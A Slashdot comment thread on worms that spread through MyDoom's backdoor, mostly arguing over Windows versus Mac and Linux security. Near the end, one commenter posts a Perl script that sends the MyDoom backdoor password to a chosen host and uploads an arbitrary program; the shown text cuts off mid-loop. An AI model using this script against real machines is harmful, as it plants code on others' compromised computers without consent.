Slashdot Mirror


New Worms Feed on MyDoom Infections

JJP writes "ZDNet Australia is reporting that two new worms, Doomjuice and Deadhat, are taking over computers previously infected by the MyDoom virus. Apparently they try to uninstall the MyDoom virus and then take over the PC to start their own malignant work. Whilst the threat these two worms pose shouldn't be too big, both needing a MyDoom backdoor, it is still a novel way to spread a virus. In the Netherlands there is a newspaper reporting this proves MyDoom was initially spread by organised crime in a dark plot to wage cyber-war and steal confidential data from our computers."

243 comments

  1. Get a Mac by BWJones · · Score: 5, Insightful

    This reminds me of that old ad which opens with a guy trying to hook up his laptop at a huge meeting to start a presentation. He is having problems getting things to work and people are yelling suggestions from the audience: "Try c: start!" or something like that. This goes on for some time with different people yelling various suggestions and then at the very end when it appears things are not going to work, someone yells: "get a Mac!" The ad then fades out.... I suppose for the Linux crowd, the yell could be "get a Penguin" or "get a boxen", but the sentiment is the same: Do something.....Do anything......but do not continue to use that unsecured Windows box. You are wasting your time and you are wasting my time and costing companies, businesses and governments big time.

    --
    Visit Jonesblog and say hello.
    1. Re:Get a Mac by IthnkImParanoid · · Score: 5, Interesting

      Funny you suggest either buying a whole new machine, or using a whole different OS, when the MyDoom problem could just be solved by not opening attachments.

      I'll just ask: is it possible for a binary file to open ports and send itself as an email attachment on a Mac? On a linux box? Are you sure you understand the problem?

      --
      It's nothing but crumpled porno and Ayn Rand.
    2. Re:Get a Mac by Matey-O · · Score: 4, Insightful

      Bullshit. There's NO reason why a windows box can't be just as stable and secure as any alternative. None (and I mean ZERO) machines on our network were affected by any of the mydoom variants.

      Sane creation of a network topology, email subsystem, proactive network monitoring, and general patch management is NECESSARY to operate a large internet connected environment, regardless of the Operating System of Choice.

      (and to head off the usual Mac'noids, show me a mac based application that scans, OCRs, and backs up to multiple Optical drives 20,000 documents an hour.)

      --
      "Draco dormiens nunquam titillandus."
    3. Re:Get a Mac by Joe+the+Lesser · · Score: 1, Interesting

      As soon as Macintosh takes over the market(if ever), viruses will target them instead.

      They're not more secure, but why hit 1/3 of the world's computers when you can hit 1/2 of them with a windows bug.

      When the first Mac worm hits, it will be huge, because their users aren't used to dealing with them.

      --
      "I only speak the truth"
      Karma: null(Mostly affected by an unassigned variable)
    4. Re:Get a Mac by nickg78 · · Score: 0, Troll

      So, are you implying there is such a thing as a secure Windows box?

    5. Re:Get a Mac by Anonymous Coward · · Score: 0

      or "get a boxen"

      Please use this term correctly or, even, better, don't use this horribly overplayed geekism at all.

    6. Re:Get a Mac by ealar+dlanvuli · · Score: 2, Insightful

      We are talking about end users, and yeah Windows security is abysmal.

      --
      I live in a giant bucket.
    7. Re:Get a Mac by Frymaster · · Score: 2, Insightful
      could just be solved by not opening attachments.

      anything else i should avoid doing? i think you amply illustrate the point that the virusmania has reduced the usability of windows.

      with my linux box and mac i can do whatever i want - including open attachments... i bought a computer so i could use it.

      is it possible for a binary file to open ports and send itself as an email attachment on a Mac?

      do you mean, "can i telnet 25 to another host"? well, yes. i hope that was a rhetorical question.

      if you mean, "can i fire up an mta and start spraying email all over creation"? then the answer is only if you have root. and if that virus has root... well, you've got bigger problems.

    8. Re:Get a Mac by Anonymous Coward · · Score: 5, Insightful

      Again, parroted on slashdot numerous times -- why hit the less than 1/3 IIS installations out there when you can hit 2/3 with an Apache bug?

      popularity isn't exactly directly related to the number of exploits it has. :)

    9. Re:Get a Mac by Anonymous Coward · · Score: 2

      (and to head off the usual Mac'noids, show me a mac based application that scans, OCRs, and backs up to multiple Optical drives 20,000 documents an hour.)

      There's NO reason why a Mac box can't do the exact same thing as any alternative. Sane creation of network topology, data backup subsystem, and general intelligence is NECESSARY to operate a large backup operation, regardless of the Operating System of Choice.

    10. Re:Get a Mac by Dionysus · · Score: 5, Interesting

      with my linux box and mac i can do whatever i want - including open attachments... i bought a computer so i could use it.

      To be infected by MyDoom, you would have to open the attachment and run the binary.

      if you mean, "can i fire up an mta and start spraying email all over creation"? then the answer is only if you have root. and if that virus has root... well, you've got bigger problems.

      Eh, no. You don't have to be root to "spray email all over creation". Outgoing connections usually use unprivileged ports. And to accept incoming connection without root, you just need to listen to a port above 1024.

      --
      Je ne parle pas francais.
    11. Re:Get a Mac by sPaKr · · Score: 1

      Why exactly do I need to be root to send mail? All i need to do is open a connection to some mta on port 25. That does not require root privileges. Do you need to be root to run elm, mutt, pine, evolution, insert mua here? No. You may need root to do other evil things like insert the worm into the boot process, or hide from the process list. But in reality these things are overrated, if you're someone who executes attachments are you going to pay attention to the running processes? And if you never reboot your *ix box does the process really need to be started on boot? There are many problems with windows, LookOut and other programs, Mydoom didn't take advantage of these, it used the most abundant resource available on computers, stupid users.

    12. Re:Get a Mac by Some+Dumbass... · · Score: 2, Insightful

      Sane creation of a network topology, email subsystem, proactive network monitoring, and general patch management is NECESSARY to operate a large internet connected environment, regardless of the Operating System of Choice.

      You realize, of course, that the average computer user wouldn't even _understand_ this sentence, much less be able (or willing?) to implement your suggestions.

      You may be right in theory, but for unskilled (read: average, normal) users in the real world, Macs are currently the safe choice. There are just fewer exploited vulnerabilities in Mac OS X than in Windows XP. So for now, "Get a Mac" isn't such bad advice, if only for practical reasons.

    13. Re:Get a Mac by IthnkImParanoid · · Score: 2, Interesting

      My point is that Windows' inherent insecurity is not the cause of MyDoom and, more specifically, the latest worms mentioned in the submission.

      Yes, the question was rhetorical, and the point is an app can start accepting connections on a given port (which is how the latest worms are spreading) no matter what your OS. It's possible to firewall everything and require admin access to open ports on Linux and OSX, but hey, it's possible on Windows too. Bad sysadmins and clueless users are a problem on every platform.

      --
      It's nothing but crumpled porno and Ayn Rand.
    14. Re:Get a Mac by Frymaster · · Score: 1
      Why exactly do I need to be root to send mail? All i need to do is open a connection to some mta on port 25.

      sigh. i offered two options - open a connection on 25, which i referred to as "telnet 25" because i am old, for which root is not required, and start up the mta (postfix on panther) for which you do need to be root.

    15. Re:Get a Mac by noisehole · · Score: 1

      from doomjuice:

      Creates the file Sync-src-1.00.tbz (28,569 bytes) and copies this file to the %Windir%, %System%, %Temp%, and %UserProfile% folders, as well as to the root folder of all the fixed and remote drives. This file is a tar archive, which contains the source code of W32.Mydoom.A@mm

      there're chances that this lil' cutie of oss will get "ported", since everyone got the source already ;)

    16. Re:Get a Mac by Moridineas · · Score: 4, Informative

      Don't mean to be pedantic--but you wouldn't say "get a boxen" because boxen is plural.

      etymologically it's an old way (well, old in English) of pluralizing that we only see in a few words...child children, brother brethren is similar too. Interestingly enough, Persian being an Indo-European language has it too--Taleban (-an) is students (pl).

    17. Re:Get a Mac by Kenja · · Score: 2, Informative

      MyDoom has its own SMTP server built into it. All it needs is access to outgoing ports. That's it, nothing more. You would not need root access for it to work. You would just need to be dumb enough to download the attachment and run it. Just like people are doing on Windows.

      --

      "Have you ever thought about just turning off the TV, sitting down with your kids, and hitting them?"
    18. Re:Get a Mac by RancidBeef · · Score: 2, Interesting

      Well, that's true to a degree. I have several Windoze boxes (on VMWare virtual machines) that I'm responsible for. However, I've noticed that if I do a fresh install with the Win2K disk on a new VM the damn thing gets the Blaster worm (or even Code Red or Nimda) before I can even install the latest service pack. Yeah, I know I should disconnect it from the net until I get the SP installed, but that's a pain in the ass too because that means I have to keep a CD around with all the SPs. As I understand it, all service ports on a Mac are off by default. If Windows came this way, I wouldn't have to worry about this. Also, it's not a problem when installing Linux because I can choose to leave the services off before I ever boot it for the first time.

    19. Re:Get a Mac by kberg108 · · Score: 0

      Yeah and when/if everyone has a Mac then there will be a shit load of viruses for the Mac whooptie doo. The reason Windows is a target is because it is such a fucking giant one and it sure as hell doesn't help when the M$ folks don't do anything about it. But if you think for a second that everyone switching OSes will stop virus writers you are sorely mistaken.

      --
      I like things that are sweet and not things that are lame. --
    20. Re:Get a Mac by dgatwood · · Score: 5, Informative
      On Mac OS X, installing a startup item requires you to manually type in your administrator password. Viruses could only become a permanent part of your system if they could convince people that there was a reason to allow them to install things. Otherwise, such a virus could only run until you rebooted your computer or logged out, making it much less effective.

      A virus would not be able to automatically start just by reading a message, as Mail doesn't allow that to happen. More significantly, it could not masquerade as another type of file, since clicking on it would pop up a dialog that says something like "Warning: the attachment 'foo.jpg.app' is an application. Since applications can contain viruses, make sure this was sent by someone you trust." or some such.

      In short, even if the Mac platform were the primary computing platform on the planet, it would not have these problems at the same level, IMNSHO.

      --

      Check out my sci-fi/humor trilogy at PatriotsBooks.

    21. Re:Get a Mac by Anonymous Coward · · Score: 2, Informative

      People aren't downloading and running an executable. They are double-clicking on an attachment or whatever. Then, since windows is all about being integrated and since most users run as "root" in Windows, it's allowed to get set up as a daemon and install itself to be loaded whenever a machine boots. In my opinion, it's the general design of the Windows operating system that is at fault. Loading an attachment (zip file was the big one at my place of work) shouldn't install a damn virus.

    22. Re:Get a Mac by dickiedoodles · · Score: 1

      Again, parroted on slashdot numerous times -- why hit the less than 1/3 IIS installations out there when you can hit 2/3 with an Apache bug? popularity isn't exactly directly related to the number of exploits it has. :)

      That's a different situation. Firstly, Macs have a much smaller percentage market share than IIS (about 3% according to Google Zeitgeist). Secondly, Microsoft is viewed as "The Evil Empire"(TM) so people are more likely to go after one of their products. Thirdly, Mydoom basically relies on user idiocy; the people who open attachments when they have been told the risks are not likely to get magically smarter just by using a Mac. Fourthly, Mydoom as well as most other viruses/worms need as many infected machines as possible to propagate (and in the case of DDOS attacks release the payload) so the more machines that can be affected the better from a virus writer's point of view.

      I'm not saying other OSes aren't more secure just that no OS is bullet proof and it seems to me windows gets more viruses not only due to its problems but also due to its successes.

      --
      In Soviet Russia Slashdot cliches use you
    23. Re:Get a Mac by PIBM · · Score: 1

      double clicking on the real .zip didn't execute the content of it .. it only started up winzip that asked what I wanted to do with it. People that then double-click on that file will get burned ..

    24. Re:Get a Mac by amyhughes · · Score: 1
      When the first Mac worm hits, it will be huge, because their users aren't used to dealing with them.
      When the first Mac worm hits it will die quickly because there will be so few Macs represented in people's address books.

      Amy

    25. Re:Get a Mac by generationxyu · · Score: 1
      it possible for a binary file to open ports and send itself as an email attachment on a Mac? On a linux box?

      There's two major problems with writing virii for OS X, or Linux.

      1. You're not covering a substantial part of the "market." You're not going to get your point across if 400 Mac users get infected with a virus. Same with Linux. Also, the average Linux user is not going to download and run an executable that someone sends them.
      2. It's harder for it to do anything substantial. Yes, it would be able to replicate itself via email. But most likely, it would be running with the privileges of the user running them. Most Win2k/XP users run as administrator. Even if they don't, it's a lot easier to get administrator on a Windows box than on a Linux/OS X box.

      --
      I mod down pyramid schemes in sigs.
    26. Re:Get a Mac by generationxyu · · Score: 1

      Find a bug in Apache that isn't patched within a day. Go ahead. I dare you.

      --
      I mod down pyramid schemes in sigs.
    27. Re:Get a Mac by dustman · · Score: 2, Insightful

      Find a bug in Apache that isn't patched within a day. Go ahead. I dare you.

      Guarantee me that if I look I won't find an apache server which is months or years out of date. Go ahead. I dare you.

    28. Re:Get a Mac by jnicholson · · Score: 1

      Adding 'n' to a word to get the plural is a Dutch (and probably other languages) formation, borrowed for those few words in English because we English can never bear to see a word or technique used in a language without trying it out.

      --
      "Do not drill any holes in your cat - it will not like it."
      -- Nick Davies
    29. Re:Get a Mac by mr3038 · · Score: 1
      Then, since windows is all about being integrated and since most user run as "root" in Windows, it's allowed to get set up as a daemon and install itself to be loaded whenever a machine boots.

      And this is different from *x systems, that allow the worm to append their "service" to .bashrc or .Xclients, exactly how? [Remember, that windows users usually run as Administrator because they are the only user of the system. A normal user logging into a linux system is logically the same thing as windows user powering up the system and logging as administrator.]

      If you want to take effective measurements against stupid users, simply install all software to /usr and setup users' home directories to /home. Then apply the magic and mount /usr as exec and read only, and mount the /home as write and noexec. Yep, the user is still able to run shell scripts but he has to execute the virus with style "sh virus.sh". On the other hand, he might also run "rm -rf ~" if virus mail asked to do so... There're fool proof systems, but I guess idiot proof systems do not exist.

      --
      _________________________
      Spelling and grammar mistakes left as an exercise for the reader.
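The mount layout suggested in the comment above (/usr read-only, /home noexec), as an added example that is not part of the original thread: a small Python audit over /proc/mounts-style lines. Both mount tables are constructed samples, and the policy table and function names are assumptions of this example.

```python
"""Audit a mount table for the layout described above: /usr mounted
read-only and /home mounted noexec. Added example; sample data is constructed."""

# Policy (an assumption of this example): options that the filesystem
# covering each path must carry.
POLICY = {
    "/usr": {"ro"},
    "/home": {"noexec"},
}

# Constructed sample: one root filesystem, everything writable and executable.
WEAK_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
proc /proc proc rw 0 0
"""

# Constructed sample: the split layout from the comment.
HARDENED_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
/dev/sda2 /usr ext3 ro 0 0
/dev/sda3 /home ext3 rw,noexec,nosuid,nodev 0 0
"""


def parse_mounts(text):
    """Parse /proc/mounts-style lines into {mount_point: set_of_options}."""
    table = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed line, ignore
        # fields: device, mount point, fs type, comma-separated options, ...
        table[fields[1]] = set(fields[3].split(","))
    return table


def covering_mount(path, table):
    """Return the longest mount point that contains `path`, or None."""
    best = None
    for mount_point in table:
        prefix = mount_point.rstrip("/") + "/"
        if path == mount_point or path.startswith(prefix):
            if best is None or len(mount_point) > len(best):
                best = mount_point
    return best


def audit(text, policy=POLICY):
    """Return one finding per policy path whose covering mount lacks an option."""
    table = parse_mounts(text)
    findings = []
    for path, required in sorted(policy.items()):
        mount = covering_mount(path, table)
        if mount is None:
            findings.append(f"{path}: no covering mount found")
            continue
        missing = required - table[mount]
        if missing:
            findings.append(
                f"{path}: served by {mount} without {', '.join(sorted(missing))}"
            )
    return findings


if __name__ == "__main__":
    for name, sample in (("weak", WEAK_MOUNTS), ("hardened", HARDENED_MOUNTS)):
        print(name, audit(sample) or "ok")
```

As the comment itself notes, noexec only blocks direct execution from /home; a script passed to an interpreter is read as data and still runs.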
    30. Re:Get a Mac by Moridineas · · Score: 1

      Actually the "an/en" suffix is much much older than Dutch, or German, or Indo-Germanic languages -- like I said, it's a very old Indo-European language feature. And since English isn't purely Indo-Germanic, or Romance, or anything, it has features from multiple families.

    31. Re:Get a Mac by BiggyP · · Score: 3, Insightful

      so, on linux, i'd download the attachment, run it through unzip, make the binary executable, then run it? not bloody likely, -1 for usability maybe, but definitely +3 for safety around newbies.

      of course i'm sure on KDE with some WINE integration it could be so much quicker and easier...

    32. Re:Get a Mac by dbirchall · · Score: 1
      Three words: "Insecure by default." Windows is. Linux and MacOS X aren't.

      There have been reports of people setting up brand spankin' new computers during some of the worse recent infestations of the Internet, and getting infected basically as soon as they touched the network, before they ever even had a chance to download the patches.

      I know, I know, now you're going to say that a good sysadmin (as if a good sysadmin would even touch Windows ;) or clueful user (ditto) would simply wait a day, or a week, or whatever, for the worms to cease, before setting up the computer.

      Right. Hey, it's only lost productivity, no biggie!

    33. Re:Get a Mac by aauu · · Score: 1

      To quote my less technically literate neighbor "What's email if you can't click on things!" His son routinely rebuilds his computer which is on a cable modem. No amount of O/S security will overcome user stupidity. This man is not ignorant of viruses. Just that viruses these days are a little more subtle than the old format c: variety. I will bet that every one of the computers infected with mydork are also running every spyware and adware program in existence. This is why people need to upgrade, their old computer just grinds to a halt with self-inflicted infections.

      --
      When I was young, I had to rub sticks together to compute.
    34. Re:Get a Mac by bill_mcgonigle · · Score: 1, Troll


      I'll just ask: is it possible for a binary file to open ports and send itself as an email attachment on a Mac? On a linux box?


      No, it's not possible - the x bit isn't set on an e-mail attachment so it can't be run. It would have to be chmodded +x before running.

      Windows's problem is that anything named .exe,.com,.bat,.scr,.pif, etc. is run as a program when opened. That's part of Windows's design and can't be "fixed".

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
    35. Re:Get a Mac by TKinias · · Score: 1

      scripsit Moridineas:

      Actually the "an/en" suffix is much much older than Dutch, or German, or Indo-Germanic languages -- like I said, it's a very old Indo-European language feature. And since English isn't purely Indo-Germanic, or Romance, or anything, it has features from multiple families.

      Getting even further OT ;) ... It's not too different from the Semitic masculine plurals -- `-in' in Arabic and `-im' in Hebrew.

      --
      In principio creauit Linus Linucem.
    36. Re:Get a Mac by Anonymous Coward · · Score: 0

      "Viruses" are biological. "Virii" are technological.

      "Cold/Flu Viruses"
      "Computer Virii"

      Simple, no?

      p.s. STOP SHOUTING.

    37. Re:Get a Mac by tcp_len · · Score: 1

      Again, parroted on slashdot numerous times -- why hit the less than 1/3 IIS installations out there when you can hit 2/3 with an Apache bug?

      Because we hate M$!!!

    38. Re:Get a Mac by Anonymous Coward · · Score: 0

      yes the action of Loading an attachment shouldn't install a damn virus, the would prevent this in their system.


      GAUGE

    39. Re:Get a Mac by ultranova · · Score: 1

      Why does a post which contributes absolutely nothing to the conversation get modded informative as opposed to offtopic ?

      Is there a Legion of English Teachers conspiring in Slashdot ?

      --

      Forget magic. Any technology distinguishable from divine power is insufficiently advanced.

    40. Re:Get a Mac by Brendan+Byrd · · Score: 1

      Someday, some hacker will write a good Mac virus (or at least a virus that is compatible with Mac) just to shut you guys up! Oh, I will laugh my head off that day.

      Sure, I use Linux, but I'm not arrogant enough to think that worms won't exist on Linux if Linux had 98% of the market share.

    41. Re:Get a Mac by da · · Score: 1
      Remember, that windows users usually run as Administrator because they are the only user of the system. A normal user logging into a linux system is logically the same thing as windows user powering up the system and logging as administrator.

      Err, where do you get this idea? A normal user logging on to a Linux system is just that - a normal user. Most people will use 'su' or 'sudo' to run tasks that require privileged access to the system (certainly that's what they should be doing. How many people always log into their *nix box as root?). Older versions of Windows required logging out and logging in as Administrator to achieve this, or giving (some) users membership of the Administrator group (common practice in many companies I've worked/consulted at). Newer versions have that "Run As" menu entry in Explorer, but I've come across several software packages that don't install properly if you use that option... So, tell me again how this is the same thing?

      --
      I reserve the right to be wrong.
    42. Re:Get a Mac by Anonymous Coward · · Score: 0

      why the condescending sigh? Your suggestions didn't make an iota of sense. Don't be offended; it's not your fault that you're stupid.

    43. Re:Get a Mac by Moridineas · · Score: 1

      Why does a post which contributes absolutely nothing to the conversation get modded informative as opposed to offtopic ?

      Is there a Legion of English Teachers conspiring in Slashdot ?



      Clearly there is NOT! If you had read my post you would know that english teachers would have no part of saying the word boxen! ;)

      Look at it this way--boxen is a part of geek culture, and you'd be hard pressed to find another source of concentrated geek culture like slashdot.

    44. Re:Get a Mac by Anonymous Coward · · Score: 0

      No IT is not, and no YOU are not.

    45. Re:Get a Mac by gazbo · · Score: 1
      That's part of Windows's design and can't be "fixed"

      Holy fuck! Then it looks like my machine must have gained sentience and is lying to me!

    46. Re:Get a Mac by mr3038 · · Score: 1
      [I wrote: A normal user logging into a linux system is logically the same thing as windows user powering up the system and logging as administrator.]

      Err, where do you get this idea? A normal user logging on to a Linux system is just that - a normal user.

      Yes, I'm familiar with the difference and I'm running SuperiorSU on my Windows 2000 installation to overcome some difficulties of not running as Administrator all the time. However, notice that I said logically. In linux, if the only user of the system is you (as in Windows and single Administrator account) then all that really matters to you can be destroyed with your user account. All your important files? Gone, because if you had write access to those, so did the worm that ran on your account. The only major difference is that the worm doesn't spread to the whole system (and even that's true ONLY IF no local exploits do exist in your system) but in case of single user home desktop, what's the difference, after all?

      --
      _________________________
      Spelling and grammar mistakes left as an exercise for the reader.
    47. Re:Get a Mac by The+Evil+Couch · · Score: 1
      yeah, I agree. The problem's in the users, not the software.

      Pretty much every Windows-based email client I've seen warns about launching executables, because they may contain viruses.

      Any user that's stupid enough to launch an executable, from someone they don't know, that they weren't expecting, that the program warns them up front that it may be a virus is going to get infected, no matter what OS they use.

  2. Re:Get a PENCIL AND PAPER by Denver_80203 · · Score: 5, Funny

    I hear those are safe too.. and just as useful to me in my business as a Mac.

  3. Proofs? by petabyte · · Score: 3, Funny

    Hmm, it "proofs" eh? Maybe we could get it installed on slashdot to proof all stories as they're posted. :)

    1. Re:Proofs? by petabyte · · Score: 1

      Ah well, they fixed it. Carry on :).

      Originally it was:
      "In the Netherlands there is a newspaper reporting this proofs MyDoom was initialy spread by organised crime in a dark plot to wage cyber-war and steal confidential data from our computers."

    2. Re:Proofs? by Anonymous Coward · · Score: 0
      Whilst the thread these two worms pose shouldn't be to big, both needing a MyDoom backdoor, it still is a novel way to spread a virus

      Yes, that would be nice...

    3. Re:Proofs? by Anonymous Coward · · Score: 0

      The sentence still doesn't make sense :-)

    4. Re:Proofs? by Anonymous Coward · · Score: 0

      And how would you say it in Dutch? Who is the retard?

  4. Deadhat by Anonymous Coward · · Score: 3, Funny

    Is that the new BSD release?

  5. Ooo! by HarveyBirdman · · Score: 4, Funny

    Maybe Red Hat or Apple paid for the *virus*. :-)

    --
    --- Ban humanity.
    1. Re:Ooo! by UFNinja · · Score: 5, Funny

      No, if it was funded by Apple it would be called iDoom. ;)

    2. Re:Ooo! by cetan · · Score: 4, Funny

      ...and you'd have Mac users paying $99 for the upgrade to iDoom 0.0.1

      --
      In Soviet Russia...michael would be rotting in Siberia!
    3. Re:Ooo! by addaon · · Score: 3, Funny

      iAgree.

      --

      I've had this sig for three days.
    4. Re:Ooo! by commodoresloat · · Score: 1

      yeah but the upgrade will come in 5 different colors and be half the size of the original version of iDoom. And don't forget, Apple will continue to support users of the original iDoom virus.

  6. Proof? by Srividya · · Score: 5, Funny

    No proof yet... BBC says MyDoom spread by Linux users to hurt SCO, Linux users say MyDoom spread by spammers to hurt everyone, spammers say MyDoom spread by BIGGER PENIS NOW... Who to believe?

    1. Re:Proof? by 0mni · · Score: 1

      Who does BIGGER PENIS NOW blame? I bet they blame Microsoft, "They just wanted to get in the news."

    2. Re:Proof? by Landaras · · Score: 4, Funny

      You misspelled 'B1GG3R P3NI5 N0W!!!1111'

      - Neil Wehneman

  7. It proves one thing. . . by UFNinja · · Score: 4, Funny

    this proofs MyDoom was initialy spread by organised crime. . .

    I think it "proofs" that the editors don't proofread the submissions. :-P

    1. Re:It proves one thing. . . by Anonymous Coward · · Score: 0

      ...worms pose shouldn't be too big...

      they did a great job with this one

  8. AIM by nycsubway · · Score: 3, Interesting

    I wonder if those random IMs I got in AIM are related to MyDoom. I got a couple random messages about capturing Osama Bin Laden from people i have talked to in ages. Seems like some sort of virus. Anyone else have that happen?

    1. Re:AIM by ParadoxicalPostulate · · Score: 4, Informative


      Funny I was just looking that up for a friend.

      This is not MyDoom.

      This link may help.

      Check that out, may help.

    2. Re:AIM by iLL_L0gic · · Score: 3, Insightful

      http://www.wired.com/news/infostructure/0,1377,62251,00.html?tw=wn_tophead_7 Has nothing to do with it. What it has to do with is idiot people clicking "Yes" on the installation of an ActiveX control that installs spyware on their system. I'd say that's still the easiest way to get a virus installed on a windows box, end users always click yes. :)

    3. Re:AIM by phillymjs · · Score: 3, Informative

      No, that's different scumware.

      ~Philly

    4. Re:AIM by Anonymous Coward · · Score: 0

      mod parent -1 off topic. this is a known bug in AIM and has nothing to do with mydoom or any other virus.

    5. Re:AIM by LostCluster · · Score: 1

      It appears to be unrelated spyware, kidnapping any active AIM client and sending out assorted "Check out this site..." links, which then prey on the fact that most people say "Yes" to the "Do you want this ActiveX control? Somebody signed it." box.

      Possibly it was inspired by MyDoom's reminder of how easy it is for a virus to wear just a little bit of sheep's clothing and get a user to give it the okay to execute.

    6. Re:AIM by Anonymous Coward · · Score: 0

      http://www.wired.com/news/infostructure/0,1377,62251,00.html?tw=wn_tophead_7
      Check this out, sounds like what you're seeing...

    7. Re:AIM by Construct403 · · Score: 1

      not to be redundant, Check out
      http://www.securityfocus.com/archive/75/353368

    8. Re:AIM by firew0lfz · · Score: 1

      yea, I got the same thing from a friend around tuesday night..

      don't know if the following virus I got was related to the AIM thing about Osama, but at the time I wasn't running AV software, and I did notice that I had been the victim of some worm that apparently was using my computer for a DoS attack (netstat was returning some SYN_SENT from me to some random address every second or so)...

      the story ends with me updating my virus definitions (been awhile since I had) and cleaned it out. I'm running a win2k machine, so don't know if the same might've happened to you... anyone else scan their system and get anything similar?

      --
      Try not to let life get in the way of living.
    9. Re:AIM by Anonymous Coward · · Score: 0

      "from people i have talked to in ages."

      Ages eh? So you are one of those people whose conversations never end? To the extreme that the people leave and send you email to try to interrupt you?

  9. Ok.. by hookedup · · Score: 2, Funny


    Here's an idea..

    Next time, if you're going to post a link that you have to register for, at least make sure it's in english.

  10. In other news... by FortKnox · · Score: 4, Funny

    In other news, by looking at the same day's news from the Netherlands, you'll see they just released "Deus Ex" and "Deus Ex: Invisible War." Conspiracy Theories have quadrupled since.

    --
    Good quote, too many chars. Seriously, the slashdot 120 char limit sucks!
  11. Thread? by $-chavito-$ · · Score: 4, Funny

    I hate it when those sneaky Windows worms pose as threads, it makes em that much harder to catch.

  12. Just Once by 4of12 · · Score: 1

    dark plot to wage cyber-war and steal confidential data from our computers."

    ...I wish that this sinister plot was met with terabytes/second of "confidential data" like, oh, free viagra offers, Nigerian 419 scams, Add 3 inches, etc...

    --
    "Provided by the management for your protection."
  13. DoomNet... by LostCluster · · Score: 5, Interesting

    MyDoom's backdoor has been demonstrated by DoomJuice and now the copycats are at it. There's now a network of zombies willing to do the bidding of anybody who hacks in... remember, the MyDoom name is based on a typo, the author wanted to call it MyDomain.

    I guess the only positive side effect is that some of these DoomJuice variants are closing the back door from the original MyDoom so that nobody else can interfere with them. Now, if only there was a MyDoom uninstaller worm that didn't have another destructive payload...

    1. Re:DoomNet... by Weird+O'Puns · · Score: 2, Informative

      Actually, according to many sources Deadhat/Vesser came before DoomJuice. So technically DoomJuice is the copycat. There's also a new variant of Welchia that makes use of MyDoom backdoor and then tries to remove it.

    2. Re:DoomNet... by That's+Unpossible! · · Score: 2, Informative

      remember, the MyDoom name is based on a typo, the author wanted to call it MyDomain

      Almost right. MyDomain was apparently a variable in the code (uhh, then I am guessing VB code?) and he spelled it MyDoomain.

      --
      Ironically, the word ironically is often used incorrectly.
    3. Re:DoomNet... by httptech · · Score: 2, Informative
      Vesser was discovered before Doomjuice, but if you look at the PE timestamp header, you see that Deadhat/Vesser was compiled on Tue Feb 4 06:23:59 2003, while Doomjuice was compiled on Tue Jan 27 06:22:58 2004. While the PE timestamp field can be easily edited, these dates are probably accurate in my opinion. So, Doomjuice can't be considered a copycat of Vesser.

      My writeup of Doomjuice: http://www.lurhq.com/mydoom-c.html
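The field the comment above reads is the 32-bit TimeDateStamp in the COFF header that follows the PE signature. As an added example (not part of the original post), this parser extracts it and flags values that cannot be taken at face value; the header bytes are constructed, the two dates from the comment are treated as UTC, and the first-sighting date is a placeholder assumption.

```python
import struct
from datetime import datetime, timezone

PE_SIGNATURE = b"PE\x00\x00"

# Compile times quoted in the comment, interpreted as UTC (assumption).
DEADHAT_STAMP = datetime(2003, 2, 4, 6, 23, 59, tzinfo=timezone.utc)
DOOMJUICE_STAMP = datetime(2004, 1, 27, 6, 22, 58, tzinfo=timezone.utc)
# Placeholder first-sighting date, constructed for this example.
FIRST_SEEN = datetime(2004, 2, 9, tzinfo=timezone.utc)


def pe_compile_time(image: bytes) -> datetime:
    """Return the COFF TimeDateStamp of a PE image as an aware UTC datetime."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # e_lfanew: little-endian offset of the PE signature, stored at 0x3C.
    (pe_off,) = struct.unpack_from("<I", image, 0x3C)
    if pe_off + 24 > len(image) or image[pe_off:pe_off + 4] != PE_SIGNATURE:
        raise ValueError("PE signature not found at e_lfanew")
    # COFF header: Machine(2), NumberOfSections(2), TimeDateStamp(4), ...
    (stamp,) = struct.unpack_from("<I", image, pe_off + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def plausibility_notes(compiled: datetime, first_seen: datetime) -> list:
    """The linker writes this field and anyone can edit it; flag obvious problems."""
    notes = []
    if compiled.timestamp() == 0:
        notes.append("timestamp is zero: stripped or never set")
    if compiled > first_seen:
        notes.append("compile time is after first sighting: skewed clock or edited field")
    return notes


def build_sample(compiled: datetime) -> bytes:
    """Constructed minimal header (not a real sample): MZ stub, signature, COFF header."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)
    coff = struct.pack("<HHIIIHH", 0x014C, 1, int(compiled.timestamp()),
                       0, 0, 0xE0, 0x010F)
    return bytes(dos) + PE_SIGNATURE + coff


if __name__ == "__main__":
    for name, when in (("Deadhat/Vesser", DEADHAT_STAMP), ("Doomjuice", DOOMJUICE_STAMP)):
        parsed = pe_compile_time(build_sample(when))
        print(name, parsed.isoformat(), plausibility_notes(parsed, FIRST_SEEN))
```
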

    4. Re:DoomNet... by L0stm4n · · Score: 1

      here do it yourself. lameness filter prevents perl code

      heh...not sure if it works but if the c code does so should this.

      --
      superman runs linux
    5. Re:DoomNet... by mroch · · Score: 1

      According to Symantec's site, they have developed a tool to remove this Welchia worm. It appears that it's not about securing PCs and is all about selling more copies of Norton and protecting the bottom line...

    6. Re:DoomNet... by httptech · · Score: 1
      Now, if only there was a MyDoom uninstaller worm that didn't have another destructive payload...


      There is now- it's called DoomHunter.A.

    7. Re:DoomNet... by gnu-generation-one · · Score: 1

      "Now, if only there was a MyDoom uninstaller worm that didn't have another destructive payload..."

      No need to make it a worm. Just send it yourself to any IP address which sends a virus email to your domain.

    8. Re:DoomNet... by L0stm4n · · Score: 2, Funny

      #!/usr/bin/perl -w
      use IO::Socket;
      use strict;

      if(@ARGV < 3) {
      print "****** Usage: $0 \<ip\> \<port\> \<program to upload\> ****\n";
      exit -1;
      }

      my ( $host, $port, $exe ) = ($ARGV[0], $ARGV[1], $ARGV[2]);
      my $doompass = "\x85\x13\x3c\x9e\xa2";

      my $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) or die "cannot open socket: $!";

      print $socket $doompass;

      open(INPUT, $exe) || die "Can't open: $!";
      while (<INPUT>){
      print $socket $_;
